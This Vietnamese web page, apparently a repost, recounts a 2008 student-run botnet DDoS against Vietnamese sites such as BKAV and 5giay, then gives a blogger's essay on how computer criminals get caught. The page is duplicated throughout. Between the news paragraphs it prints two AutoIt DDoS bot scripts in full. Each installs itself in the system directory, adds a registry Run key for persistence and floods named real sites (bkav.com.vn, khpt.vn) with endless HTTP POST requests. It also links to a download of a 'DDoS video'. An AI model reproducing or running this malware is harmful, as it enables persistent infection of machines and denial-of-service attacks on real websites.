Từ sáng Chủ Nhật ngày 5/10/2008, trên một số diễn đàn trực tuyến chuyên về IT xuất hiện thông tin cho rằng vài website lớn tại Việt Nam bị tấn công từ chối dịch vụ (DDoS), mà chủ yếu là các website thương mại điện tử như 5giay, nhatnghe, BKAV. Hiện tượng này tái diễn liên tục trong hai ngày tiếp theo (5-7/10/2008).
Ngày 8/10, 5giay.vn là website đầu tiên khẳng định là nạn nhân của hình thức tấn công từ chối dịch vụ. Theo như thông tin 5giay cung cấp, đợt tấn công DDoS ngày 7/10 có qui mô lớn nhất từ trước đến nay từ hàng ngàn máy tính, dẫn đến hệ thống phần cứng quá tải và gián đoạn truy cập.

Bkis và phòng Phòng chống tội phạm công nghệ cao (C15 - Bộ Công An) chính thức bắt tay truy tìm thủ phạm từ ngày 7/10. Kết quả điều tra cho thấy kẻ gây ra vụ tấn công này là một học sinh Trung học tại Quảng Nam. Thủ phạm đã huy động bạn bè đi cài đặt virus tại các cửa hàng Game, Internet công cộng. Từ đây, virus tiếp tục phát tán qua USB. Bằng cách đó, học sinh này đã tạo dựng được một mạng Botnet với khoảng 1.000 máy tính bị cướp quyền điều khiển. Đây chính là công cụ để thực hiện tấn công  DDoS vào một số website nêu trên vào ngày 8/10. Trước những bằng chứng không thể chối cãi, đối tượng đã thừa nhận hành vi vi phạm với tang vật là chiếc máy tính dùng "chỉ huy" các cuộc tấn công.

#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("chem.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\chem.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "chem", "REG_SZ", @SystemDir & "\chem.exe")
$1 = IniRead(@SystemDir & "\chem.ini", "1", "1", "")IniWrite(@SystemDir & "\chem.ini", "1", "1", $1 + 1)
If $1 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "chem")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "bkav.com.vn"$TIN[1] = "bkav.com.vn"$TIN[2] = "bkav.com.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/home.aspx"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: top1.vn" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://top1.vn" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd 

#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("khpt.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\khpt.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "khpt", "REG_SZ", @SystemDir & "\khpt.exe")
$1 = IniRead(@SystemDir & "\khpt.ini", "1", "1", "")IniWrite(@SystemDir & "\khpt.ini", "1", "1", $1 + 1)
If $1 = 5 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "khpt")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "khpt.vn"$TIN[1] = "khpt.vn"$TIN[2] = "khpt.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/forum//index.php"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: LlyKil" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://google.com" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd

Video DDOS Trường Tồn (tương tự BKAV)
http://www.mediafire.com/?hobkjoa5dj7qfab

Từ sáng Chủ Nhật ngày 5/10/2008, trên một số diễn đàn trực tuyến chuyên về IT xuất hiện thông tin cho rằng vài website lớn tại Việt Nam bị tấn công từ chối dịch vụ (DDoS), mà chủ yếu là các website thương mại điện tử như 5giay, nhatnghe, BKAV. Hiện tượng này tái diễn liên tục trong hai ngày tiếp theo (5-7/10/2008).
Ngày 8/10, 5giay.vn là website đầu tiên khẳng định là nạn nhân của hình thức tấn công từ chối dịch vụ. Theo như thông tin 5giay cung cấp, đợt tấn công DDoS ngày 7/10 có qui mô lớn nhất từ trước đến nay từ hàng ngàn máy tính, dẫn đến hệ thống phần cứng quá tải và gián đoạn truy cập.

Bkis và phòng Phòng chống tội phạm công nghệ cao (C15 - Bộ Công An) chính thức bắt tay truy tìm thủ phạm từ ngày 7/10. Kết quả điều tra cho thấy kẻ gây ra vụ tấn công này là một học sinh Trung học tại Quảng Nam. Thủ phạm đã huy động bạn bè đi cài đặt virus tại các cửa hàng Game, Internet công cộng. Từ đây, virus tiếp tục phát tán qua USB. Bằng cách đó, học sinh này đã tạo dựng được một mạng Botnet với khoảng 1.000 máy tính bị cướp quyền điều khiển. Đây chính là công cụ để thực hiện tấn công  DDoS vào một số website nêu trên vào ngày 8/10. Trước những bằng chứng không thể chối cãi, đối tượng đã thừa nhận hành vi vi phạm với tang vật là chiếc máy tính dùng "chỉ huy" các cuộc tấn công.

#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("chem.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\chem.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "chem", "REG_SZ", @SystemDir & "\chem.exe")
$1 = IniRead(@SystemDir & "\chem.ini", "1", "1", "")IniWrite(@SystemDir & "\chem.ini", "1", "1", $1 + 1)
If $1 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "chem")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "bkav.com.vn"$TIN[1] = "bkav.com.vn"$TIN[2] = "bkav.com.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/home.aspx"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: top1.vn" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://top1.vn" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd 

#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion$PROCESS = ProcessList("khpt.exe")
If $PROCESS[0][0] > 3 Then ExitFileCopy(@ScriptFullPath, @SystemDir & "\khpt.exe", 1)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "khpt", "REG_SZ", @SystemDir & "\khpt.exe")
$1 = IniRead(@SystemDir & "\khpt.ini", "1", "1", "")IniWrite(@SystemDir & "\khpt.ini", "1", "1", $1 + 1)
If $1 = 5 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "khpt")
EndIfTCPStartup()Dim $TIN[3]$TIN[0] = "khpt.vn"$TIN[1] = "khpt.vn"$TIN[2] = "khpt.vn"While 1
$NGAUNHIEN = Random(0, 2, 1)$DATASIZE = StringLen("")$HOST = $TIN[$NGAUNHIEN]$PAGE = "/forum//index.php"$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: LlyKil" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://google.com" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)WEnd

Video DDOS Trường Tồn (tương tự BKAV)
http://www.mediafire.com/?hobkjoa5dj7qfab

Hồi nhỏ và ngay cả bây giờ, nhiều lúc tôi tự hỏi, làm sao người ta bắt được tội phạm nhỉ? Tôi luôn nghĩ rằng chỉ cần tên tội phạm cẩn thận một chút thì chẳng có cách nào chứng minh được hắn phạm tội cả.

Ví dụ như nếu giết người, hắn chỉ cần kĩ lưỡng xóa dấu vân tay, quăng khẩu súng xuống sông hay biển gì đó, giấu luôn xác chết rồi tạo chứng cứ ngoại phạm. Vậy mà những kẻ làm hết tất cả việc đó một cách chuyên nghiệp vẫn bị bắt như thường.

Người ta nói lưới trời lồng lộng, tuy thưa mà khó thoát là vậy. Hay nói cách khác, nếu muốn người ta không biết, trừ phi mình không làm. Haha hai câu này giống trong phim bộ Hồng Kông quá.

Hồi lúc mới tập tễnh bước chân vào lĩnh vực bảo mật, ước mơ lớn nhất của tôi là trở thành một tay cảnh sát điều tra chuyên về tội phạm liên quan đến máy tính, hay còn gọi tội phạm công nghệ cao như báo chí vẫn thường nói.

Chắc là do tôi đọc nhiều tiểu thuyết trinh thám máy tính quá :-p. Cũng có thể do tôi thích tìm hiểu tâm lý của bọn tội phạm.

Khi tìm hiểu một vụ nào đó, tôi thường tự hỏi (và cố tìm câu trả lời một cách thích thú), lúc thực hiện hành động này, tên tội phạm đang nghĩ gì nhỉ; mục đích của hắn là gì, tại sao hắn lại làm A, mà không làm B hay C.

Nói nghe có thể làm cho bạn giật mình, tôi thường nghĩ theo cách bọn tội phạm nghĩ. Ví dụ như khi bước chân vào một siêu thị, tôi thích nghĩ đến việc làm thế nào để chôm đồ của siêu thị mà không bị phát hiện. Hoặc khi vào trụ sở của một công ti nào đó, tôi cũng thường quan sát để tìm cách lọt qua các camera quan sát mà không bị ghi hình. Dĩ nhiên tôi chỉ nghĩ cho vui (theo thói quen nghề nghiệp), chứ nếu tôi làm thiệt thì chắc giờ tôi không còn ngồi đây viết blog rồi :-p.

Thường người ta có khuynh hướng cho rằng, tội phạm có liên quan đến máy tính và Internet thì khó bắt hơn tội phạm thông thường. Chúng (có vẻ) vô hình mà. Mọi người thường nghĩ bắt tên trộm chiếc xe bao giờ cũng dễ hơn tìm ra tên đã đánh cắp tài khoản hộp mail.

Thật tế cả hai đều khó (hoặc dễ) như nhau, tùy theo trình độ của tên tội phạm. Nếu chỉ xét đến đám tội phạm còn non kinh nghiệm, mới phạm tội vài lần, tôi nghĩ rằng truy lùng tội phạm máy tính dễ hơn là tội phạm thông thường. Thiệt ra tôi chưa truy lùng tội phạm thông thường lần nào :-p, nên tôi chỉ nói một cách chủ quan vậy thôi.

Không có gì là vô hình trên Internet cả. Mỗi hành động của bạn đều được ghi lại ở đâu đó, vô tình hay cố ý, bắt buộc hay không bắt buộc. Nếu muốn, vào ngày này năm sau, người ta vẫn có thể biết được rằng, hôm nay vào giờ này, bạn đang đọc blog của tôi.

Khi ai đó muốn xóa dấu vết của hắn ở ngoài đời, hắn chỉ cần lau thật sạch dấu vân tay và vết giày dép nếu có. Sẽ không hề đơn giản như thế nếu hắn muốn xóa thông tin lưu trong máy tính. Một khi bạn đã lưu trữ thông tin vào máy tính, hầu như bạn chẳng còn cơ hội nào để xóa nó đi. Dĩ nhiên bạn có thể đốt cháy máy tính của mình, nhưng vẫn còn có rất nhiều máy tính khác ngoài kia trên Internet có chứa thông tin liên quan đến bạn.

Rất ít người hiểu được điều này, đó cũng là lý do ngày càng có nhiều người sử dụng Internet làm công cụ để thực hiện hành vi phạm pháp. Họ nghĩ rằng Internet sẽ che chở họ, mà không biết rằng, chính Internet đã góp phần rất lớn để tìm ra họ.

Chẳng có đường sống nào một khi đã phạm tội, vậy nên hãy tập sống lương thiện!

Hồi nhỏ và ngay cả bây giờ, nhiều lúc tôi tự hỏi, làm sao người ta bắt được tội phạm nhỉ? Tôi luôn nghĩ rằng chỉ cần tên tội phạm cẩn thận một chút thì chẳng có cách nào chứng minh được hắn phạm tội cả.

Ví dụ như nếu giết người, hắn chỉ cần kĩ lưỡng xóa dấu vân tay, quăng khẩu súng xuống sông hay biển gì đó, giấu luôn xác chết rồi tạo chứng cứ ngoại phạm. Vậy mà những kẻ làm hết tất cả việc đó một cách chuyên nghiệp vẫn bị bắt như thường.

Người ta nói lưới trời lồng lộng, tuy thưa mà khó thoát là vậy. Hay nói cách khác, nếu muốn người ta không biết, trừ phi mình không làm. Haha hai câu này giống trong phim bộ Hồng Kông quá.

Hồi lúc mới tập tễnh bước chân vào lĩnh vực bảo mật, ước mơ lớn nhất của tôi là trở thành một tay cảnh sát điều tra chuyên về tội phạm liên quan đến máy tính, hay còn gọi tội phạm công nghệ cao như báo chí vẫn thường nói.

Chắc là do tôi đọc nhiều tiểu thuyết trinh thám máy tính quá :-p. Cũng có thể do tôi thích tìm hiểu tâm lý của bọn tội phạm.

Khi tìm hiểu một vụ nào đó, tôi thường tự hỏi (và cố tìm câu trả lời một cách thích thú), lúc thực hiện hành động này, tên tội phạm đang nghĩ gì nhỉ; mục đích của hắn là gì, tại sao hắn lại làm A, mà không làm B hay C.

Nói nghe có thể làm cho bạn giật mình, tôi thường nghĩ theo cách bọn tội phạm nghĩ. Ví dụ như khi bước chân vào một siêu thị, tôi thích nghĩ đến việc làm thế nào để chôm đồ của siêu thị mà không bị phát hiện. Hoặc khi vào trụ sở của một công ti nào đó, tôi cũng thường quan sát để tìm cách lọt qua các camera quan sát mà không bị ghi hình. Dĩ nhiên tôi chỉ nghĩ cho vui (theo thói quen nghề nghiệp), chứ nếu tôi làm thiệt thì chắc giờ tôi không còn ngồi đây viết blog rồi :-p.

Thường người ta có khuynh hướng cho rằng, tội phạm có liên quan đến máy tính và Internet thì khó bắt hơn tội phạm thông thường. Chúng (có vẻ) vô hình mà. Mọi người thường nghĩ bắt tên trộm chiếc xe bao giờ cũng dễ hơn tìm ra tên đã đánh cắp tài khoản hộp mail.

Thật tế cả hai đều khó (hoặc dễ) như nhau, tùy theo trình độ của tên tội phạm. Nếu chỉ xét đến đám tội phạm còn non kinh nghiệm, mới phạm tội vài lần, tôi nghĩ rằng truy lùng tội phạm máy tính dễ hơn là tội phạm thông thường. Thiệt ra tôi chưa truy lùng tội phạm thông thường lần nào :-p, nên tôi chỉ nói một cách chủ quan vậy thôi.

Không có gì là vô hình trên Internet cả. Mỗi hành động của bạn đều được ghi lại ở đâu đó, vô tình hay cố ý, bắt buộc hay không bắt buộc. Nếu muốn, vào ngày này năm sau, người ta vẫn có thể biết được rằng, hôm nay vào giờ này, bạn đang đọc blog của tôi.

Khi ai đó muốn xóa dấu vết của hắn ở ngoài đời, hắn chỉ cần lau thật sạch dấu vân tay và vết giày dép nếu có. Sẽ không hề đơn giản như thế nếu hắn muốn xóa thông tin lưu trong máy tính. Một khi bạn đã lưu trữ thông tin vào máy tính, hầu như bạn chẳng còn cơ hội nào để xóa nó đi. Dĩ nhiên bạn có thể đốt cháy máy tính của mình, nhưng vẫn còn có rất nhiều máy tính khác ngoài kia trên Internet có chứa thông tin liên quan đến bạn.

Rất ít người hiểu được điều này, đó cũng là lý do ngày càng có nhiều người sử dụng Internet làm công cụ để thực hiện hành vi phạm pháp. Họ nghĩ rằng Internet sẽ che chở họ, mà không biết rằng, chính Internet đã góp phần rất lớn để tìm ra họ.

Chẳng có đường sống nào một khi đã phạm tội, vậy nên hãy tập sống lương thiện!